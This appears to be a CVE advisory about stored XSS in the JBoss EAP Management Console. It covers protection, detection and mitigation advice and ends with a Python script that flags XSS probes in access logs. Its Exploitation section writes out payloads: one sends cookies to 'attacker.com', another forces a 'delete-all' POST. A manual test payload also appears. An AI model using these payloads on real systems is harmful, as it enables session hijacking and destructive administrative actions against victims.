How the CVE Works
The vulnerability arises when the JBoss EAP Management Console fails to properly sanitize user-supplied input before storing it in the backend database. Attackers can inject malicious JavaScript payloads through input fields, which are then persistently stored. When administrators or users access the affected pages, the stored script executes in their browser context. This allows session hijacking, credential theft, or unauthorized actions under the victim’s permissions. The attack exploits improper output encoding when rendering stored data in the web interface.
DailyCVE Form
Platform: JBoss EAP
Version: < 3.7.11.Final
Vulnerability: Stored XSS
Severity: Critical
Date: May 6, 2025
What Undercode Says:
Exploitation
1. Payload Injection:
<script>alert(document.cookie)</script>
2. Exfiltrate Sessions:
<script>fetch('https://attacker.com/steal?data='+btoa(document.cookie))</script>
3. CSRF + XSS Combo:
<script>fetch('/management-console/delete-all', {method: 'POST'})</script>
Protection
1. Output Encoding (encode stored data for the HTML context at render time, which is the defect named above):
String sanitized = ESAPI.encoder().encodeForHTML(userInput); // HTML-entity-encode before writing into the page
2. Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'self'
(Do not add 'unsafe-inline' to script-src: it permits exactly the inline script an injected payload relies on, so the policy would not block this class of attack.)
3. Patch Upgrade (there is no "mvn update" goal; pin the fixed console version in pom.xml):
<dependency>
  <groupId>org.jboss.hal</groupId>
  <artifactId>hal-core</artifactId>
  <version>3.7.11.Final</version>
</dependency>
Detection
1. Scan with ZAP (zap-cli has no "--scan" flag; the XSS active scanner is selected with quick-scan):
zap-cli quick-scan -s xss https://jboss-console.example.com
2. Manual Testing:
'/><img src=x onerror=alert(1)>
Mitigation
1. Disable Console (the management interface is configured in the <management> element of standalone.xml, not in a subsystem; console-enabled="false" turns off the web console while leaving the HTTP management API in place):
<management>
  <management-interfaces>
    <http-interface security-realm="ManagementRealm" console-enabled="false">
      <socket-binding http="management-http"/>
    </http-interface>
  </management-interfaces>
</management>
The same change via the management CLI:
/core-service=management/management-interface=http-interface:write-attribute(name=console-enabled,value=false)
2. Log Monitoring (requests in the access log are percent-encoded, so match the encoded form as well as the literal tag; -r is not needed for a single file):
grep -iE "<script|%3Cscript" /var/log/jboss/access.log
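A grep only catches the literal tag; probes reach the access log percent-encoded, sometimes twice. As an added example (not from this advisory), the following Python triage script parses constructed common-log-format lines for the management console, fully decodes the request target, and flags the markers seen in the payloads above. The log lines and path names are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format). The injected requests
# are percent-encoded as an HTTP client would send them; line 3 is double-encoded,
# which a plain grep for "script>" over the raw file would never match.
SAMPLE_LOG = """\
10.0.0.5 - admin [06/May/2025:10:12:01 +0000] "GET /management-console/ HTTP/1.1" 200 5120
10.0.0.9 - - [06/May/2025:10:12:07 +0000] "POST /management-console/config?name=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 312
10.0.0.9 - - [06/May/2025:10:12:09 +0000] "GET /management-console/search?q=%2527%2F%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 118
10.0.0.5 - admin [06/May/2025:10:13:00 +0000] "GET /management-console/static/app.js HTTP/1.1" 200 90211
"""

# ip, ident, user, timestamp, method, request target, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers typical of stored-XSS probes. This is a triage heuristic for log review,
# not an input filter: output encoding (see Protection) is what actually fixes the bug.
MARKERS = ("<script", "javascript:", "onerror=", "onload=", "<img", "<svg")


def fully_decode(s: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding so double-encoded probes surface."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_xss_probes(log_text: str) -> list:
    """Return one record per log line whose decoded request target carries an XSS marker."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than silently mis-parse
        target = fully_decode(m["target"]).lower()
        found = [mk for mk in MARKERS if mk in target]
        if found:
            hits.append({"line": lineno, "ip": m["ip"], "user": m["user"],
                         "method": m["method"], "markers": found, "target": target})
    return hits


if __name__ == "__main__":
    for hit in find_xss_probes(SAMPLE_LOG):
        print(hit)
```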